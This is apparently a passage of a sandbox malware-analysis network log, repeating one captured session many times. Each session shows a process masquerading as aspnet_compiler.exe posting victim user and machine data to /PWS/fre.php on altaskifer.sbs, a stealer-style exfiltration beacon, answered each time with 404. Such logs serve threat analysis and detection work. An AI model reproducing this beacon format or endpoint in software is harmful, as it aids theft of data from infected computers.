                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zA5YwEC8tHXW4D0jTjw8734u8oqqER7c0u5tmG6iK6RjFGDY1ecwy45QEFwY7bl81H3TT4an64hIZjSfWjgUiO5MWDy5qwGeLb9Kp5B3XnZmlSQ8vrwBVD9U0l4Oi%2FCkYw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 87001325395e4c1b-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                102192.168.2.649831172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:50.516268969 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:50.653028965 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:51.033349037 CEST607INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:50 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hD6NcVAhFU0rSXAm9VnK6XvKyy%2BBNSbye1nX%2FRObdcT%2F2lj8uhCKKQLgS2IT1M38CASB%2BBH9B9YXAB336%2Bd8Aznvx4tBC42IzU%2FU5WhXKFiaNz3UqbrqxEhowHOX5DHvvA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8700132a3d4b6dbb-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                103192.168.2.649832172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:51.314444065 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:51.438863039 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:51.821953058 CEST601INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:51 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bmlXRJ%2F5ihBKO45ilZajU4OhuvSUmoB9939Ky3lUk6UlJftKmXy8ljNtNIyA6491G%2BfFXc9Fol2McZg53fWB6GqzbBt3opRu4izJ8C%2B11b9fFn2cQjuxd7O6eMeBAiHEyw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8700132f1e075c6f-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                104192.168.2.649833172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:52.096159935 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:52.221276999 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:52.595098019 CEST603INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:52 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vY5GH98lW%2F0OszuKMxmacjI29F8%2BnvmeX%2B07v6j2ICmQPWTOySGByYAAiBenkYxd7nNjJqSPb9vgROQGQfCJqPm%2F1mQ6nvnRERLQJNV1U1NYUSjZYY3h6RDpYs1eJoZYpQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870013340e8cb3c1-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                105192.168.2.649834172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:52.865138054 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:52.989932060 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:53.373054981 CEST603INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:53 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gl3VVm1kc8Yhh8U3a9Z97oKKv5Qs9WhPrGtOrgkV%2F6VPMilDIDz0WSmsgCz7ENBx2%2FawTSToARcS2VRGSSRmXfCZ%2Bxg0FnvOGBc6cPU%2BCFpiZIKyBKgwI0JLj4dmi1ygvA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 87001338cfa7961a-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                106192.168.2.649835172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:53.641649961 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:53.769378901 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:54.149101973 CEST603INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:54 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NUzBx%2BEpxHHepjHv07XDwi%2F2fUx%2FBJooZjHNEfYfcOte%2BGeXQyB8BhzAbjKiuxAYDBh9ocffKa1N1JvOCEocRMWYLDt1dmdyYNUzNYOpTabEeggAOA1Ed2FGLeD9DiegNA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8700133daf0509ba-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                107192.168.2.649836172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:54.422589064 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:54.546266079 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:54.946742058 CEST607INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:54 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6g3KaMv5qima7%2BvG7GPiheKGX7wseQs6TNEmDXs6i67wFd91sMBEen2KHJx%2FK%2F9FdT59VwDbgKUb8Ld%2BKSr4zFGNrEFSj28orDFuNxFc0%2BdxN37sGrBlcX1Xf%2F3FkyrJ3w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870013428e6f4c16-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                108192.168.2.649837172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:55.220104933 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:55.344695091 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:55.725775957 CEST601INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:55 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6uYNXHeHXbzoIRqn%2BcqvXLoxt6bdvjtWwATNwhNdcBD%2Bk0TtGyE6NXay20dMj6dDX%2FrdaeTNkFXMOVysyMCybf8E1i2fxfyOul0VBG5OQYytfz55dzBbFmYWMQ5YRa8vQA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870013478a825c6c-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                109192.168.2.649838172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:55.998033047 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:56.121968031 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:56.498783112 CEST607INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:56 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zl0%2Bmmr3ZrCtRr9useS9N6tkvQs8MSgzROXMwujLYU%2F%2BTN%2FpsPVA%2BtA6ctTfcN48jrdNc2egHZj01xirYTFGDL%2BlfhplrJ2P2bGlMpuJjYRSP3DiVO8Hpl8HxT3kCv3ILg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8700134c6e7d742a-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                110192.168.2.649839172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:56.772335052 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:56.896739006 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:57.295444965 CEST603INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:57 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CIpf%2Bnyl%2FqKHdOYLwBniygSqMfR4atIsMTfaD1YLU3Viom85R4Zy%2FXrtD6rAUx8eJMA3rrlXbbqCl1Mfc47VOZVxu9VrcAUhTO8nrZ5UZ5QW7OkT4M4XWzIzlRTSnm%2BISQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870013513ea26c88-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                111192.168.2.649840172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:57.593507051 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:57.717902899 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:58.094893932 CEST597INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:58 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9mtUaaRut9HMTDKTnqaOmT4FfLjjCk9Z8AFWsoll9msNC2ftTMRHVynCFgxZyUFvb0GsQVPkyoaZvebQLPH5wX62CZSa6gSlk%2BBzLPVVWfRMjhgMXurKuSuRuBwRDf9J2w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870013565bf07441-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                112192.168.2.649841172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:59.991734028 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:31:00.115890980 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:31:00.493268013 CEST605INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:31:00 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XeIHdRYDGzWAM4lm%2FcDBR23ZIBR6Sc%2FFAeVdmeXd4R55B3Vw2Rqm3f81JfR1Wsk2Sf9cXzpmPa%2F3WPOw08C%2Bq8zG1rlXxXwTCiSMlWSA0%2BAClC2ZawN1gUls5OjFHlgnEg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870013655b39748e-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                113192.168.2.649842172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:31:00.769505024 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:31:00.893640995 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:31:01.281761885 CEST605INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:31:01 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lHy%2BnWeke6DX4uCy3gxufoNGkIwFntcPnL0BC6QSPN%2Blu6eyrb%2FigTs3atNr2QkSPT4DY5I%2BcbFkTsURCtT1fvQORwzs4Ty1JMK%2BQliVp7k9FvsPjOfyPgHBctNI1Mwmog%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8700136a3ab731da-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                114192.168.2.649843172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:31:01.546958923 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:31:01.670955896 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:31:02.058294058 CEST615INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:31:01 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WlVQEPP01w%2BHhl%2FIdbZdtvQ9PWlK2k1USYK5QJVY73qHD%2B2Mrm%2FDr0kfVnFI3y2qoZjN%2BV27ygjXrOjwbvT3%2FRCTlW4%2B5SWV7uHonlKj6%2Fg%2FXdmCT7m5lP%2BKJ8DLDoNfCQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8700136f1c49961a-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                115192.168.2.649844172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:31:02.332844973 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:31:02.457158089 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:31:02.836838961 CEST609INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:31:02 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
